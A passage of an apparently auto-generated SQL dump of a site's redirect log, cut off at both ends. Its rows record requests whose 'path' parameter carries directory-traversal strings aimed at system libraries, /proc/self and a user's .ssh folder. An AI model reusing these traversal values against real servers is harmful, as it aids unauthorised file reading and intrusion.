00:00:00',301),(80072,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/distutils/../macpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fdistutils%2F..%2Fmacpath.py','',1,0,'2026-06-24 18:45:00','0000-00-00 00:00:00',301),(80073,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../../bind/../python3.6/./struct.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2F..%2Fbind%2F..%2Fpython3.6%2F.%2Fstruct.py','',1,0,'2026-06-24 18:45:00','0000-00-00 00:00:00',301),(80074,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../.sqmailattach/../../../lib64/python3.6',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2F.sqmailattach%2F..%2F..%2F..%2Flib64%2Fpython3.6','',1,0,'2026-06-24 18:45:01','0000-00-00 00:00:00',301),(80075,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../bin/../.httprequest/../.httprequest',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fbin%2F..%2F.HttpRequest%2F..%2F.HttpRequest','',1,0,'2026-06-24 18:45:01','0000-00-00 00:00:00',301),(80076,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../.cl.selector/../../../sbin/../include/python2.7/funcobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.cl.selector%2F..%2F..%2F..%2Fsbin%2F..%2Finclude%2Fpython2.7%2Ffuncobject.h','',1,0,'2026-06-24 18:45:02','0000-00-00 00:00:00',301),(80077,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../games/../python3.12/../libwebpdecoder.so.3',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fgames%2F..%2Fpython3.12%2F..%2Flibwebpdecoder.so.3','',1,0,'2026-06-24 18:45:03','0000-00-00 00:00:00',301),(80078,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../tkinter/../../python3.6/symtable.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2Ftkinter%2F..%2F..%2Fpython3.6%2Fsymtable.py','',1,0,'2026-06-24 18:45:04','0000-00-00 00:00:00',301),(80079,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/linecache.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Flinecache.pyo','',1,0,'2026-06-24 18:45:05','0000-00-00 00:00:00',301),(80080,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/vim/../../include/sys',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fvim%2F..%2F..%2Finclude%2Fsys','',1,0,'2026-06-24 18:45:06','0000-00-00 00:00:00',301),(80081,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/../multipath',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2F..%2Fmultipath','',1,0,'2026-06-24 18:45:07','0000-00-00 00:00:00',301),(80082,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/sqlite3/../base64.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2Fbase64.py','',1,0,'2026-06-24 18:45:08','0000-00-00 00:00:00',301),(80083,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/asynchat.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fasynchat.py','',1,0,'2026-06-24 18:45:09','0000-00-00 00:00:00',301),(80084,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/cache/./../.wp-cli/../../../opt/../bin/../..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fcache%2F.%2F..%2F.wp-cli%2F..%2F..%2F..%2Fopt%2F..%2Fbin%2F..%2F..','',1,0,'2026-06-24 18:45:10','0000-00-00 00:00:00',301),(80085,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.ssh/../../../dev/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.ssh%2F..%2F..%2F..%2Fdev%2F..','',1,0,'2026-06-24 18:45:11','0000-00-00 00:00:00',301),(80086,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../python3.12/sqlite3/../datetime.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fpython3.12%2Fsqlite3%2F..%2Fdatetime.py','',1,0,'2026-06-24 18:45:12','0000-00-00 00:00:00',301),(80087,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python2.7/../autosprintf.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython2.7%2F..%2Fautosprintf.h','',1,0,'2026-06-24 18:45:14','0000-00-00 00:00:00',301),(80088,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../mysqlclient/../python3.6/../gconv',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython3.6%2F..%2Fgconv','',1,0,'2026-06-24 18:45:15','0000-00-00 00:00:00',301),(80089,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/python3.6/sqlite3/../threading.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fpython3.6%2Fsqlite3%2F..%2Fthreading.py','',1,0,'2026-06-24 18:45:16','0000-00-00 00:00:00',301),(80090,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../pkgconfig/../sssd/../python2.7/userstring.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpkgconfig%2F..%2Fsssd%2F..%2Fpython2.7%2FUserString.py','',1,0,'2026-06-24 18:45:17','0000-00-00 00:00:00',301),(80091,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/.././../../lib/debug/../sysctl.d/../debug/../modules',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.%2F..%2F..%2Flib%2Fdebug%2F..%2Fsysctl.d%2F..%2Fdebug%2F..%2Fmodules','',1,0,'2026-06-24 18:45:17','0000-00-00 00:00:00',301),(80092,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/glob.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fglob.pyc','',1,0,'2026-06-24 18:45:19','0000-00-00 00:00:00',301),(80093,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python3.6/__phello__.foo.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython3.6%2F__phello__.foo.py','',1,0,'2026-06-24 18:45:19','0000-00-00 00:00:00',301),(80094,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/sqlite3/../pdb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2Fpdb.py','',1,0,'2026-06-24 18:45:21','0000-00-00 00:00:00',301),(80095,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/cmd.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Fcmd.pyc','',1,0,'2026-06-24 18:45:22','0000-00-00 00:00:00',301),(80096,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/importlib/../../firebird',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fimportlib%2F..%2F..%2Ffirebird','',1,0,'2026-06-24 18:45:23','0000-00-00 00:00:00',301),(80097,'https://3s-technologies.com.tr/tr/91534?path=/home/../proc/self/../sys/debug/../../zoneinfo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fproc%2Fself%2F..%2Fsys%2Fdebug%2F..%2F..%2Fzoneinfo','',1,0,'2026-06-24 18:45:24','0000-00-00 00:00:00',301),(80098,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/.././python3.12/logging',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2F.%2Fpython3.12%2Flogging','',1,0,'2026-06-24 18:45:25','0000-00-00 00:00:00',301),(80099,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../pkgconfig/../python3.6/../libpcrecpp.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpkgconfig%2F..%2Fpython3.6%2F..%2Flibpcrecpp.so','',1,0,'2026-06-24 18:45:26','0000-00-00 00:00:00',301),(80100,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/xmlrpc/../graphlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fxmlrpc%2F..%2Fgraphlib.py','',1,0,'2026-06-24 18:45:27','0000-00-00 00:00:00',301),(80101,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../tkinter/../../php',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2Ftkinter%2F..%2F..%2Fphp','',1,0,'2026-06-24 18:45:28','0000-00-00 00:00:00',301),(80102,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/json/../fpformat.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fjson%2F..%2Ffpformat.py','',1,0,'2026-06-24 18:45:29','0000-00-00 00:00:00',301),(80103,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/multipath/../apache2/../python3.6/csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmultipath%2F..%2Fapache2%2F..%2Fpython3.6%2Fcsv.py','',1,0,'2026-06-24 18:45:29','0000-00-00 00:00:00',301),(80104,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/.././python3.6/wave.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2F.%2Fpython3.6%2Fwave.py','',1,0,'2026-06-24 18:45:30','0000-00-00 00:00:00',301),(80105,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/hmac.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fhmac.py','',1,0,'2026-06-24 18:45:30','0000-00-00 00:00:00',301),(80106,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../sw/../python3.12/argparse.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsw%2F..%2Fpython3.12%2Fargparse.py','',1,0,'2026-06-24 18:45:31','0000-00-00 00:00:00',301),(80107,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/readelf',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Freadelf','',1,0,'2026-06-24 18:45:31','0000-00-00 00:00:00',301),(80108,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/.././../../lib64/python2.7/../lua',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Flua','',1,0,'2026-06-24 18:45:32','0000-00-00 00:00:00',301),(80109,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../www/../../../../usr/../sbin',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fwww%2F..%2F..%2F..%2F..%2Fusr%2F..%2Fsbin','',1,0,'2026-06-24 18:45:33','0000-00-00 00:00:00',301),(80110,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../wordpress-backups/../php/../.wp-cli',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fwordpress-backups%2F..%2Fphp%2F..%2F.wp-cli','',1,0,'2026-06-24 18:45:34','0000-00-00 00:00:00',301),(80111,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../tkinter/../../python3.6/bdb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2Ftkinter%2F..%2F..%2Fpython3.6%2Fbdb.py','',1,0,'2026-06-24 18:45:35','0000-00-00 00:00:00',301),(80112,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../gawk/../python3.6/xml',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fgawk%2F..%2Fpython3.6%2Fxml','',1,0,'2026-06-24 18:45:36','0000-00-00 00:00:00',301),(80113,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../../tmp/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2F..%2Ftmp%2F..','',1,0,'2026-06-24 18:45:37','0000-00-00 00:00:00',301),(80114,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/concurrent/../genericpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fconcurrent%2F..%2Fgenericpath.py','',1,0,'2026-06-24 18:45:38','0000-00-00 00:00:00',301),(80115,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/csplit',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fcsplit','',1,0,'2026-06-24 18:45:39','0000-00-00 00:00:00',301),(80116,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../sa/../python3.12/opcode.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fsa%2F..%2Fpython3.12%2Fopcode.py','',1,0,'2026-06-24 18:45:40','0000-00-00 00:00:00',301),(80117,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../krb5/../python3.12/../python2.7/simplehttpserver.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fkrb5%2F..%2Fpython3.12%2F..%2Fpython2.7%2FSimpleHTTPServer.pyc','',1,0,'2026-06-24 18:45:41','0000-00-00 00:00:00',301),(80118,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/ntpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Fntpath.py','',1,0,'2026-06-24 18:45:42','0000-00-00 00:00:00',301),(80119,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../limits.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2Flimits.h','',1,0,'2026-06-24 18:45:43','0000-00-00 00:00:00',301),(80120,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/cat',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fcat','',1,0,'2026-06-24 18:45:44','0000-00-00 00:00:00',301),(80121,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/distutils/../codecs.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fdistutils%2F..%2Fcodecs.py','',1,0,'2026-06-24 18:45:45','0000-00-00 00:00:00',301),(80122,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/concurrent/../../perl5',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fconcurrent%2F..%2F..%2Fperl5','',1,0,'2026-06-24 18:45:46','0000-00-00 00:00:00',301),(80123,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python2.7/distutils/command',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython2.7%2Fdistutils%2Fcommand','',1,0,'2026-06-24 18:45:47','0000-00-00 00:00:00',301),(80124,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/encodings/../../python3.12/../python3.6/symtable.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fencodings%2F..%2F..%2Fpython3.12%2F..%2Fpython3.6%2Fsymtable.py','',1,0,'2026-06-24 18:45:48','0000-00-00 00:00:00',301),(80125,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/.././python3.6/random.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2F.%2Fpython3.6%2Frandom.py','',1,0,'2026-06-24 18:45:49','0000-00-00 00:00:00',301),(80126,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../.cl.selector/../../../sbin/../include/python2.7/weakrefobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.cl.selector%2F..%2F..%2F..%2Fsbin%2F..%2Finclude%2Fpython2.7%2Fweakrefobject.h','',1,0,'2026-06-24 18:45:50','0000-00-00 00:00:00',301),(80127,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/../asm-generic',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2F..%2Fasm-generic','',1,0,'2026-06-24 18:45:51','0000-00-00 00:00:00',301),(80128,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python2.7/filecmp.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython2.7%2Ffilecmp.py','',1,0,'2026-06-24 18:45:52','0000-00-00 00:00:00',301),(80129,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/git-core/../../include/obstack.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fgit-core%2F..%2F..%2Finclude%2Fobstack.h','',1,0,'2026-06-24 18:45:53','0000-00-00 00:00:00',301),(80130,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../sse2/../python3.12/argparse.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsse2%2F..%2Fpython3.12%2Fargparse.py','',1,0,'2026-06-24 18:45:54','0000-00-00 00:00:00',301),(80131,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib/realmd/../python2.7/../rpm/../..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib%2Frealmd%2F..%2Fpython2.7%2F..%2Frpm%2F..%2F..','',1,0,'2026-06-24 18:45:55','0000-00-00 00:00:00',301),(80132,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../pkgconfig/../python2.7/../gawk',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpkgconfig%2F..%2Fpython2.7%2F..%2Fgawk','',1,0,'2026-06-24 18:45:56','0000-00-00 00:00:00',301),(80133,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/git-core/../../include/python3.6m/structmember.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fgit-core%2F..%2F..%2Finclude%2Fpython3.6m%2Fstructmember.h','',1,0,'2026-06-24 18:45:57','0000-00-00 00:00:00',301),(80134,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/vim/vimfiles/../../../include/netinet',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fvim%2Fvimfiles%2F..%2F..%2F..%2Finclude%2Fnetinet','',1,0,'2026-06-24 18:45:58','0000-00-00 00:00:00',301),(80135,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python3.6m/objimpl.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython3.6m%2Fobjimpl.h','',1,0,'2026-06-24 18:45:59','0000-00-00 00:00:00',301),(80136,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../pm-utils/../python2.7/ast.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpm-utils%2F..%2Fpython2.7%2Fast.pyc','',1,0,'2026-06-24 18:46:00','0000-00-00 00:00:00',301),(80137,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/gnupg/../python-cllib/../../include/linux/uinput.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fgnupg%2F..%2Fpython-cllib%2F..%2F..%2Finclude%2Flinux%2Fuinput.h','',1,0,'2026-06-24 18:46:01','0000-00-00 00:00:00',301),(80138,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../tkinter/../../python3.6/trace.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2Ftkinter%2F..%2F..%2Fpython3.6%2Ftrace.py','',1,0,'2026-06-24 18:46:02','0000-00-00 00:00:00',301),(80139,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/mail',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2FMail','',1,0,'2026-06-24 18:46:03','0000-00-00 00:00:00',301),(80140,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../dev/../usr/src',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Fdev%2F..%2Fusr%2Fsrc','',1,0,'2026-06-24 18:46:04','0000-00-00 00:00:00',301),(80141,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/../lib64/libproxy/../python3.12/../python3.6/queue.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2F..%2Flib64%2Flibproxy%2F..%2Fpython3.12%2F..%2Fpython3.6%2Fqueue.py','',1,0,'2026-06-24 18:46:05','0000-00-00 00:00:00',301),(80142,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../mysqlclient/../python3.6/../sssd',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython3.6%2F..%2Fsssd','',1,0,'2026-06-24 18:46:06','0000-00-00 00:00:00',301),(80143,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../pkgconfig/../lua/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpkgconfig%2F..%2Flua%2F..','',1,0,'2026-06-24 18:46:07','0000-00-00 00:00:00',301),(80144,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../../sse2/../python2.7/queue.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2F..%2Fsse2%2F..%2Fpython2.7%2FQueue.py','',1,0,'2026-06-24 18:46:08','0000-00-00 00:00:00',301),(80145,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../python3.12/.././libpython2.7.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpython3.12%2F..%2F.%2Flibpython2.7.so','',1,0,'2026-06-24 18:46:09','0000-00-00 